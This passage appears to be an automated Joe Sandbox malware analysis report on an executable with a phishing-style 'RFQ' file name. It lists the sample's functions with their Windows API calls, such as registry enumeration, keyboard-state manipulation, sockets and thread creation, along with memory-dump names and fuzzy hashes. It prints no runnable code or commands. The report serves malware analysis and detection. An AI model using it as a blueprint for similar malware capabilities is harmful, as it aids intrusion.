                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                        • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                        • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                        • String ID:
                                                        • API String ID: 2027346449-0
                                                        • Opcode ID: f0ceecdc90b01f2c9ddf0369269a16fa16a69f0e3d9f986347dd5438d1ccccc0
                                                        • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                        • Opcode Fuzzy Hash: f0ceecdc90b01f2c9ddf0369269a16fa16a69f0e3d9f986347dd5438d1ccccc0
                                                        • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                        Function 0047A66E Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                          • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                        • GetMenu.USER32 ref: 0047A703
                                                        • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                        • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                        • _wcslen.LIBCMT ref: 0047A79E
                                                        • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                        • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                        • String ID:
                                                        • API String ID: 3257027151-0
                                                        • Opcode ID: 80d25b5d47cdb8856cfd5c6f23c0a19e515c97fff049208cbae9d6eea43d64d6
                                                        • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                        • Opcode Fuzzy Hash: 80d25b5d47cdb8856cfd5c6f23c0a19e515c97fff049208cbae9d6eea43d64d6
                                                        • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                        Function 0046D230 Relevance: 10.7, APIs: 7, Instructions: 170networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastselect
                                                        • String ID:
                                                        • API String ID: 215497628-0
                                                        • Opcode ID: 0902b8d125b16e906fbee135168885a915a185ebb0dc395c6f8acc5970aa3ebc
                                                        • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                        • Opcode Fuzzy Hash: 0902b8d125b16e906fbee135168885a915a185ebb0dc395c6f8acc5970aa3ebc
                                                        • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                        Function 004443FC Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetParent.USER32(?), ref: 0044443B
                                                        • GetKeyboardState.USER32(?), ref: 00444450
                                                        • SetKeyboardState.USER32(?), ref: 004444A4
                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                        • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                        • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                        • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                        Function 004445F4 Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetParent.USER32(?), ref: 00444633
                                                        • GetKeyboardState.USER32(?), ref: 00444648
                                                        • SetKeyboardState.USER32(?), ref: 0044469C
                                                        • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                        • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                        • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                        • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                        • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                        • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                        • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                        Function 0045537F Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                        • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                        • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                        • DeleteObject.GDI32(?), ref: 00455736
                                                        • DeleteObject.GDI32(?), ref: 00455744
                                                        • DestroyIcon.USER32(?), ref: 00455752
                                                        • DestroyWindow.USER32(?), ref: 00455760
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                        • String ID:
                                                        • API String ID: 2354583917-0
                                                        • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                        • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                        • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                        • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                        Function 0044982A Relevance: 10.6, APIs: 7, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                        • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                        • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                        • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                        Function 0044882A Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                        • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Window$Enable$Show$MessageMoveSend
                                                        • String ID:
                                                        • API String ID: 896007046-0
                                                        • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                        • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                        • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                        • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                        Function 00448AB2 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                        • GetFocus.USER32 ref: 00448ACF
                                                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Window$Enable$Show$FocusMessageSend
                                                        • String ID:
                                                        • API String ID: 3429747543-0
                                                        • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                        • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                        • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                        • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                        Function 0045D448 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                        • __swprintf.LIBCMT ref: 0045D4E9
                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                        • String ID: %lu$\VH
                                                        • API String ID: 3164766367-2432546070
                                                        • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                        • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                        • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                        • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                        Function 00450B7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                        • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                        • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: Msctls_Progress32
                                                        • API String ID: 3850602802-3636473452
                                                        • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                        • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                        • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                        • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                        Function 00455531 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                        • String ID:
                                                        • API String ID: 3985565216-0
                                                        • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                        • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                        • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                        • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                        Function 0041F6F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • _malloc.LIBCMT ref: 0041F707
                                                          • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                          • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                          • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                        • _free.LIBCMT ref: 0041F71A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap_free_malloc
                                                        • String ID: [B
                                                        • API String ID: 1020059152-632041663
                                                        • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                        • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                        • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                        • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                        Function 00413D7F Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                        • __calloc_crt.LIBCMT ref: 00413DB0
                                                        • __getptd.LIBCMT ref: 00413DBD
                                                        • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                        • _free.LIBCMT ref: 00413E07
                                                        • __dosmaperr.LIBCMT ref: 00413E12
                                                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
